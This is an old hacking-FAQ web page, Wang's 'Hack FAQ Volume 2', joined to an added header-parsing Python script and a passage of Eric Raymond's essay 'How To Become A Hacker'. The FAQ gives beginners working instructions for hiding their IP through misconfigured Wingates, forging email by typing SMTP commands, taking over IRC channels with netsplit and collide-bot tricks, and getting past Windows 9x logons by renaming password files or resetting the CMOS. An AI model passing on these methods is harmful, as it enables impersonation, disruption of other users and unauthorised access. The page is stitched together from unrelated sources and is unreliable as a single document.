
hacker News

This site is for fun only. I disclaim anything you may do as a fundamental anguish; this site is not, I repeat not, responsible for anything you do with this information. It is only meant to be a stepping stone for education on computers.


Hack FAQ < Volume 2 >
credited to Wang
Frequently asked questions about hacking and computers

--------------------------------------------------------------------------------

Volume 2. If you have any topics you want covering, please fill in the online form at http://www.wangproducts.co.uk or email me at Wang@most-wanted.com and I will consider putting them into the next volume. ALSO! If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously). To receive an email each time a new Hack Faq volume is released, sign up to our mailing list at http://www.wangproducts.co.uk

--------------------------------------------------------------------------------

Topics Covered

What are Wingates?
Where do I find out the addresses of Wingates?
What are Proxys?
What are Firewalls?
How do I forge email?
What are Email headers?
What does the stuff in an Email header mean?
What is IRC?
How can I hack Ops on an IRC channel?
How can I change my Windows boot-up/turn-off screens?
How can I break into a windows 9x system?

--------------------------------------------------------------------------------

What are Wingates?

A wingate is a windows-based computer that can be used as a gateway to other computers. It is running the software 'Wingate'. The idea is that you would install it on a LAN (Local Area Network) and then it would allow the people on the LAN to connect to the internet under the wingate computer's modem. However, if the person who set up the wingate is stupid (which most of them are) they will leave it improperly configured. This means that not just people who are on the LAN have access to it, everyone on the Internet has access! Wingates are kind of like diversions that you can take when connecting to servers (Do I explain this well or what?).
Here is an example (using Telnet): If I want to connect to "Phreak.org" on port "25", I could simply load telnet up, tell it to connect - and Bingo, I'm connected. But how anonymous is that? The chances are that when I connect to that server it logs my IP address along with the time I connected and the date. If I do anything bad, they can contact my Internet Service Provider and get me flung off. So, what you're probably saying is, "Ok, so is there any way I can fake my IP address so that they can't find out who I am?". Well, that's where the Wingates come in. Let's try connecting to Phreak.org again, this time through a Wingate: I load up telnet, and instead of connecting straight to phreak.org - I connect to the wingate, say, Wingate.com on port 23 (port 23 is the usual port Wingates operate on) and it gives me the prompt "Wingate>". I then type in "Phreak.org 25" and the wingate sends me to Phreak.org on port 25. The difference is - I am connecting under the wingate's IP address, and not my own!

This isn't foolproof though, so don't go around thinking you're untraceable - if someone really wanted to find out who you were, chances are they could. However, saying this, most Wingates have little or no logging - which means that they don't keep track of who goes through them...so you might just get away with your haxor escapades. I made a program which deals with the problem of Wingates going up and down; it's called Server 2000 and it's available from http://www.wangproducts.co.uk

--------------------------------------------------------------------------------

Where do I find out the addresses of Wingates?

Well, this is slightly more tricky because Wingates go up and down all the time. A wingate scanner is available from my website as part of the WangScript WarTools ( http://come.to/wangscript ) so you can download that. Basically that scans a range of IP addresses and tells you if it finds any wingates. The second method (far easier) is to connect to some big IRC network (eg. eu.undernet.org or Irc.dal.net) and type the command "/stats k". This will give you a list of all the people banned from the server and their addresses. Chances are most of them have been banned for using Wingates! So, just copy down their addresses and then try telnetting to them on port 23. If it responds "Wingate>" - you got one!

--------------------------------------------------------------------------------

What are proxies?

Proxy servers can handle HTTP, FTP and GOPHER. Each has its own port. A proxy is made up of a server name and what port it is on. Example: proxy.foobar.net:80. Server address/name: proxy.foobar.net. Port: 80. Say you want to be a bit more anonymous by hiding your IP; one solution would be to use a proxy. If someone tracked the proxy it would give them the location of that server, and not you! So I suppose you could say a proxy achieves the same thing as a wingate. You can use proxies with Netscape, Internet Explorer, and mIRC to anonymize your online time.

--------------------------------------------------------------------------------

What are firewalls?

A firewall is a system (or group of systems) that controls access between two networks. They can exist to block incoming traffic / to permit incoming traffic.

--------------------------------------------------------------------------------

How do I forge email?

Telnet to a mail server on port 25 (usually you can just get an ISP, e.g. BTInternet, and then add mail.btinternet.com). Now, different servers will run different mailing programs - that is expected...but when you connect to a mail server the most likely mail program you are likely to encounter is SendMail (a program which is known for glitches and flaws). How do you know if it's SendMail? When you telnet to the mail server it might mention 'Sendmail' or there may be some numbers like '8.8.3/8.6.9' - that is a pretty good sign that it is running sendmail.
Once connected to the mail server, if it is sendmail - type in the following (may be different on some versions):

Helo
Mail from:
Rcpt to:
Data
. (just a single dot)

If it isn't SendMail then the syntax will be slightly different, but along the same lines. Here is an example of what you might type:

helo aol.com
mail from: youaredodgy@hacker.com
rcpt to: billclinton@whitehouse.gov
data
I know what your up to you dirty old man
.

So is that completely untraceable? Well, No. The average internet user will wet their pants if you forge an email to them from their own address with the message "I will become you!"...and they won't have a clue how to trace it. But anyone with any skill will know exactly how to find out where it came from. They can do this by reading the email headers. Headers are the extra bits that come with an email that you can't by default see (although there will be an option in your email program to switch "Show All Headers" on or "View Source of Email"). The thing is, when you send an email your IP address gets attached to it (Damn that IP address thing again!). Send a fake mail to yourself and see if you can find your email address in the headers.

--------------------------------------------------------------------------------

What are Email headers?

Headers are the extra bits that come with an email that you can't by default see (although there will be an option in your email program to switch "Show All Headers" on or "View Source of Email").
Here is an example of an email (all the real server names have been removed and replaced by fakes):

Return-Path:
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net (InterMail v4.01.01.02 201-229-111-106) with SMTP id <19990730093810.ECQX20505.mta2-svc@fubar.org> for ; Fri, 30 Jul 1999 10:38:10 +0100
Received: med fubar.org via smail vid stdio
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Mozilla-Status: 8001

--------------------------------------------------------------------------------

What does the stuff in an Email header mean?

Right, now the analysis of what that garbage means! First, why would you want to know what the headers mean? Here's a few reasons why you NEED to know:

1> It will give you loads of computer names that you can explore and yes!, even hack.
2> Ever had some spam mail sent to you with loads of adverts, or wondered who email bombed you? The first step to learning how to spot email forgeries and spot the culprit is to be able to read headers.
3> Learn how you can forge email and avoid getting found out.
4> Find out the weaknesses of your enemy's computer by reading their headers.

Here's that email example again:

Return-Path:
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net (InterMail v4.01.01.02 201-229-111-106) with SMTP id <19990730093810.ECQX20505.mta2-svc@fubar.org> for ; Fri, 30 Jul 1999 10:38:10 +0100
Received: med fubar.org via smail vid stdio
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
Message-Id:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Let's go through that previous email one section at a time:

Return-Path:
This is the address that will be used if you choose to click 'reply' in your email program.
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net (InterMail v4.01.01.02 201-229-111-106) with SMTP id <19990730093810.ECQX20505.mta2-svc@fubar.org> for ; Fri, 30 Jul 1999 10:38:10 +0100
This tells us that fubar.org (with the IP address 57.11.151.287) passed this mail on to the computer named mta2-svc.dodgy.net, which was running the InterMail email program. SMTP stands for 'simple mail transfer protocol' by the way. Then we can see that this email was sent to Git@dodgy.net, and then it has the date and time information. So basically this part of the header names the computers involved in the mail transfer process, the programs involved and the target address.

Received: med fubar.org via smail vid stdio
Ok, so this header isn't exactly an everyday one. I am not sure exactly what this part means, but I take it that it just tells us that the email was received from fubar.org, and the second part is the program that handled it. Smail could be SendMail; you could test that by connecting to the server on port 25 and seeing what it greets you with.

Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
These few lines are self explanatory.

Message-Id:
The first part of this message ID says 'Pine'. Pine is an email program for Unix type systems (stands for 'Pine is not Elm'). So we could gather that the person who sent this message was using a unix type system or a shell account loaded with Pine (and he was as well, because I sent this message from my shell account!). The second part of the ID is 19990730 - the date (30/07/99). The next part is the time, 0442 - 04:42. The 13156 is the number identifying who wrote the email.

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Mime (Multipurpose Internet Mail Extensions) is a protocol to view email. The character set "us-ascii" tells us what character set this email will use. Some email uses ISO ascii instead, generally if it originates outside the US.
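As an added example that is not part of Wang's FAQ, here is a short Python script that does the walk through the Received: lines described above mechanically: it unfolds each Received: header, pulls out the 'from', 'by' and 'with' fields and the bracketed address, puts the hops in sender-to-recipient order, and reports where the chain is inconsistent or where a bracketed literal is not a valid IPv4 address (the FAQ's own fake 57.11.151.287 has an octet above 255, which a forgery check should refuse to trust). The message it parses is a constructed sample modelled on the fake header above; the Return-Path value, the second Received: line, the shell.fubar.org host, 10.0.0.5 and the Message-ID are assumptions, not taken from the FAQ.

```python
"""Walk the Received: chain of an e-mail and sanity-check each hop.

Each relay prepends its own Received: line, so the topmost header is the last
hop and the bottom one is closest to the sender. A hop whose 'from' host does
not match the previous hop's 'by' host, or whose bracketed literal is not a
real IPv4 address, is a sign that headers were forged or inserted.
"""
import ipaddress
import re
from email import message_from_string

# Constructed sample modelled on the FAQ's fake header. The Return-Path value,
# the second Received: line (shell.fubar.org, 10.0.0.5) and the Message-ID are
# assumptions for this example, not values from the FAQ.
SAMPLE_MESSAGE = """\
Return-Path: <wang@fubar.org>
Received: from fubar.org ([57.11.151.287])
\tby mta2-svc.dodgy.net (InterMail v4.01.01.02 201-229-111-106)
\twith SMTP id <19990730093810.ECQX20505.mta2-svc@fubar.org>
\tfor <Git@dodgy.net>; Fri, 30 Jul 1999 10:38:10 +0100
Received: from localhost (shell.fubar.org [10.0.0.5]) by fubar.org via smail;
\tFri, 30 Jul 1999 04:42:37 -0500
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang <wang@fubar.org>
To: Git@dodgy.net
Subject: Wang is here
Message-ID: <Pine.LNX.3.96.19990730044213156@fubar.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Wang is here.
"""

FROM_RE = re.compile(r"\bfrom\s+(\S+)", re.IGNORECASE)
BY_RE = re.compile(r"\bby\s+(\S+)", re.IGNORECASE)
WITH_RE = re.compile(r"\bwith\s+(\S+)", re.IGNORECASE)
BRACKET_RE = re.compile(r"\[([^\]]+)\]")


def is_valid_ipv4(text):
    """True only for a syntactically valid dotted quad (every octet 0-255)."""
    try:
        ipaddress.IPv4Address(text)
        return True
    except ValueError:
        return False


def parse_received(raw_message):
    """Return the hops oldest-first (sender side first, final delivery last)."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        line = " ".join(value.split())          # unfold continuation lines
        clause, _, date = line.partition(";")   # the timestamp follows the first ';'
        from_m = FROM_RE.search(clause)
        by_m = BY_RE.search(clause)
        with_m = WITH_RE.search(clause)
        addr_m = BRACKET_RE.search(clause)
        addr = addr_m.group(1) if addr_m else None
        hops.append({
            "from": from_m.group(1) if from_m else None,
            "by": by_m.group(1) if by_m else None,
            "with": with_m.group(1) if with_m else None,
            "addr": addr,
            "addr_valid": is_valid_ipv4(addr) if addr else False,
            "date": date.strip() or None,
        })
    hops.reverse()  # headers are prepended, so reverse to get sender-first order
    return hops


def check_chain(hops):
    """Flag invalid bracketed literals and breaks in the from/by hand-off chain."""
    findings = []
    for i, hop in enumerate(hops):
        if hop["addr"] and not hop["addr_valid"]:
            findings.append(f"hop {i}: bracketed literal {hop['addr']} is not a valid IPv4 address")
        if i > 0:
            prev_by, this_from = hops[i - 1]["by"], hop["from"]
            if prev_by and this_from and prev_by.lower() != this_from.lower():
                findings.append(f"hop {i}: chain break, {prev_by} handed off but {this_from} is claimed")
    return findings


if __name__ == "__main__":
    hops = parse_received(SAMPLE_MESSAGE)
    for i, hop in enumerate(hops):
        print(f"hop {i}: {hop['from']} [{hop['addr']}] -> {hop['by']} via {hop['with']} at {hop['date']}")
    for finding in check_chain(hops):
        print("WARNING:", finding)
```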
Well, we just analysed that header - I know that's a lot to take in, but try it! When you get an email, check out the headers and use the guide above as a guide. Headers vary LOADS, so don't expect to see exactly what was in my header. However, most of it will be the same; try getting some server names and then telnetting to them on ports 25 or 110 (SMTP and POP ports). Hacker Hacker covered this topic really well in GTMHH volume 3, so if you want more info, download that.

--------------------------------------------------------------------------------

What is IRC?

IRC allows you to connect to millions of chat servers around the world. Every server has a number of rooms (some of them over 1000) dealing with different topics (yes, you guessed it...hacking is quite a big topic there!). Most people will advise you not to go into rooms such as #Hack, #Hacking, #Phreaking, #Crackers etc. and say "I want to know how to hack, teach me!"...and I agree with them! If you do this, the chances are all the hackers will laugh at you and probably nuke you (Nuking involves them using a program to either disconnect you from the chat server, or even crash your computer. These are known as DOS attacks - Denial Of Service). Now you're probably thinking - why tell us to get on IRC then? Well, if you want to learn about programming - this is a good place to get answers. When I was learning the language Pascal and I got stuck on a few things, I went on IRC and asked some people to help me with them.

The best IRC client for windows is mIRC. mIRC is quite a neat little program which has its own programming language built in to let you customize it and create your own commands (hacking central or what). When you program in mIRC your programs are called Scripts. There are millions of websites dedicated to distributing these scripts, and there are many different types (Utility scripts, Friendly scripts, War scripts etc.)
You can get mIRC at: www.mirc.com
You can get Scripts from: www.mircx.com / www.mirc.net / www.xcalibre.com

If you use Unix or Linux or something similar, then your best client is probably BitchX (be afraid, be very afraid). This is available from: www.bitchx.com

Ok, now the programming knowledge bit. This is difficult because it really is impossible to write a text file which you can read and then say, right, I can program in X now. What you can do though, is read a text file and get a basic idea of how the language works - and then experiment yourself (also try downloading some source code).

--------------------------------------------------------------------------------

How can I hack Ops on an IRC channel?

Well, you want the moon on a stick don't you? Oh well, here's what you will need:

An IRC client, whether it be mIRC or BitchX (Not Globalchat !! urghh!)
A nice script with quick access to Op commands/Chanserv/Nickserv
A LinkLooker
A MCB

Let's take a large IRC network, "Irc.Dal.net". Dalnet consists of around 20 servers all around the world so that people can connect to the servers near them and get faster speeds/less lag. Sometimes, a particular IRC server will split from the rest of the network and be 'marooned' on its own for a while. It will then rejoin the rest of the network and everything will go back to normal. There is however, a good exploit of IRC that can happen when these Splits occur. When a split occurs, if you quickly connect to the server that has split and join a normally thriving channel (such as #mIRC, #Hackers etc.) you will (usually) find that the room is empty, and you have Ops!! (An @ by your name). When the server then rejoins the rest of the network you will find that you join the 'Real' channel with all the people in - but you still have Ops! This is how most hacks of Channel Ops work. So now you're probably saying "So how do I know when a server splits??". A Link looker is a tool that will detect a server split.
You give it a nickname and some details (including the server to connect to) and it will connect and sit there monitoring the network activity. If a server splits - you will see some text appear warning you of a split. This is when you would normally rush off to join that server/join the room to hack. When you are on a large server like Dalnet, because it has lots of child servers it is more likely to experience a split. However, if you load up a link looker don't expect to see splits instantly; you may have to wait quite a while!

So, what happens when your split server rejoins the network and you have Ops in the channel? Well, the experienced will tell you - they quickly deop you to make sure you don't attempt a takeover. They may even have a bot in the room to make sure that no unauthorised nicknames get ops. MCB (Multi Collide Bot) is a great program that creates a clone of a nick you want to kill (almost always an op on the channel you are trying to hack) on a server that has split (yes, the one Link Looker informed you of). Basically you feed MCB the name or names of the nick you want to kill and tell it what split server to establish those clones on, and upon rejoin - BAM/SMACK/KILL!! Yes, that's right, the target is thrown out of the channel (losing ops) and must re-establish a connection with a server to get back onto IRC and into the channel. So yes, you have figured it out. If you kill all of the ops on a channel and you ride in on a split you will be the only op in the channel. You can get these programs and more from the WangScript website ( http://come.to/wangscript ), just download the WarTools addon.

--------------------------------------------------------------------------------

How can I change my Windows boot-up/turn off screens?

Don't you hate that Windows boot-up graphic? Oh! And what about that 'It is now safe to turn off your computer' screen!
If you want to show your friends that you're really serious about hacking, let's think about changing those screens. After all, your friends will probably worship you after you change your 'it is now safe...' screen into a 'It is NEVER safe to turn off your computer' screen. Microsoft has tried to hide these screens from you by making them have different extensions (e.g. a picture would usually have an extension of .jpg, .gif, or .bmp). Here is where to find them:

The bootup graphic is hidden in either a file named c:\logo.sys and/or ip.sys. To see this file, open File Manager, click "view", then click "by file type," then check the box for "show hidden/system files." Then, back on "view," click "all file details." To the right of the file logo.sys you will see the letters "rhs." These mean this file is "read-only, hidden, system."

The 'It is now safe', and 'Windows is now shutting down...' screens are in the c:\windows\system directory. I think they are also hidden - so just switch on "show all files". They are called 'Logos.sys' and 'Logow.sys'.

Now, get hold of an image editing program (you could use MSPaint that comes with Windows, or get hold of a better one like Paint Shop Pro). Load up one of the files (I would start with logos.sys or logow.sys), and alter it to your desire, but be sure not to alter the size of the picture or the number of colours it uses etc. (It is quite precise about what it should be; if you muck it up then the graphic will not be shown at all! Hint: keep a spare copy!)

Now the trouble with using one of the existing logo files is that they only allow you to use their original colours. If you really want to alter it well, start a fresh image but make sure the width is 320 and the height is 400. Now you are free to use any colour combination available in this program. Remember to save the file as c:\logo.sys for your start-up logo, or c:\windows\logow.sys and/or c:\windows\logos.sys for your shutdown screens.
Now, say you need to get rid of the image you have changed it to, or you have someone who wants to use your computer - and you don't want them to see what you've done. Here's what you can do to get your start-up logo back. Just change the name of c:\logo.sys to something else. Something like logo.bak. Microsoft programmed Windows to recognise that there is no screen, and to therefore put the normal one back on (a hidden copy that windows has)!

--------------------------------------------------------------------------------

How can I break into a windows 9x system?

Right, you load up a windows9x computer and you're greeted with a LOGON dialog screen - what do you do??? Here are the things you can try:

1> Try pressing (yes, it's true) CANCEL, christ! Sometimes that actually works! How much security do you think windows has now??

2> Load up the computer and press whatever F key you press to get into the Boot menu (on my comp I press F8, but on some it may be different - like F5 or something). Choose to go to MSDOS or similar, so you can access DOS. When you get the DOS prompt type:

rename c:\windows\*.pwl c:\windows\*.zzz

This renames the *.pwl files (the ones that store the password) to something so that Windows can't find them. Now when you get to that damn Logon screen, just type anything as the password and you'll get in! When you want to put it back to normal, just go back to DOS and type:

rename c:\windows\*.zzz c:\windows\*.pwl

3> Ok, what if you can't access the boot keys because someone has disabled them? Turn off the computer, insert a boot disk. When the computer loads up (if it boots from A: drive then C:) it should read the boot disk and drop you into DOS. Now you can use the above technique to gain access.

4> Right, what if they have been clever and disabled their boot keys AND made sure that it doesn't boot from A:? Well, this is a little extreme...but: Get a screwdriver, solder sucker and soldering iron. Open up the computer's casing.
Remove the battery, then plug the battery back in. Your computer now hopefully has the CMOS default settings. Go into the CMOS and set it to first check the A: drive when booting up. There may be an alternative to taking the battery out: many motherboards have a 3 pin jumper to reset the CMOS to its default settings. Look for a jumper close to the battery or look at your manual if you have one.

--------------------------------------------------------------------------------

Conclusion

Some useful stuff there to kick start your Hacking career. Most of the stuff there is for newbies, so if you are already an amazing hacker - please don't bother reading these guides as they will only go over stuff you probably already know! If there is anything I haven't covered and you would like me to consider putting into my next text file OR you have any alternative answers to what I have given, please fill in the online form at http://www.wangproducts.co.uk or email me at: Wang@most-wanted.com

Wang
http://welcome.to/wangsdomain
http://www.wangproducts.co.uk
18 August 1

______________________________________________________________________

How To Become A Hacker

Eric Steven Raymond
Thyrsus Enterprises

Copyright © 2001 Eric S. Raymond

Revision History
Revision 1.25, 2 Jun 2004, esr: New translations.
Revision 1.24, 20 Jan 2004, esr: Belatedly take notice, in the first paragraph, that this document has become authoritative for a lot of people.

--------------------------------------------------------------------------------

Table of Contents

Why This Document?
What Is a Hacker?
The Hacker Attitude
1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.
Basic Hacking Skills
1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.
Status in the Hacker Culture
1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself
The Hacker/Nerd Connection
Points For Style
Other Resources
Frequently Asked Questions

Why This Document?

As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker?". Back in 1996 I noticed that there didn't seem to be any other FAQs or web documents that addressed this vital question, so I started this one. A lot of people now consider it definitive, and I suppose that means it is. Still, I don't claim to be the exclusive authority on this topic; if you don't like what you read here, write your own.

If you are reading a snapshot of this document offline, the current version lives at http://catb.org/~esr/faqs/hacker-howto.html.

Note: there is a list of Frequently Asked Questions at the end of this document. Please read these—twice—before mailing me any questions about this document.

Numerous translations of this document are available: Bulgarian, Catalan, Chinese (Simplified), Danish, Dutch, Finnish, German, Hebrew, Hungarian, Italian, Japanese, Korean, Polish, Portuguese (European), Spanish, Turkish, and Swedish. Note that since this document changes occasionally, they may be out of date to varying degrees.

The five-dots-in-nine-squares diagram that decorates this document is called a glider. It is a simple pattern with some surprising properties in a mathematical simulation called Life that has fascinated hackers for many years. I think it makes a good visual emblem for what hackers are like — abstract, at first a bit mysterious-seeming, but a gateway to a whole world with an intricate logic of its own. Read more about the glider emblem here.
What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer.
Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits.
Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Basic Hacking Skills

1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

Java is also a good language for learning to program in. It is more difficult than Python, but produces faster code than Python. I think it makes an excellent second language.
But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one or two languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it.
That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor.)

It's best, actually, to learn all five of these (Python, Java, C/C++, Perl, and LISP). Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.
Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under MacOS or any other closed-source system is like trying to learn to dance while wearing a body cast.

Under OS/X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

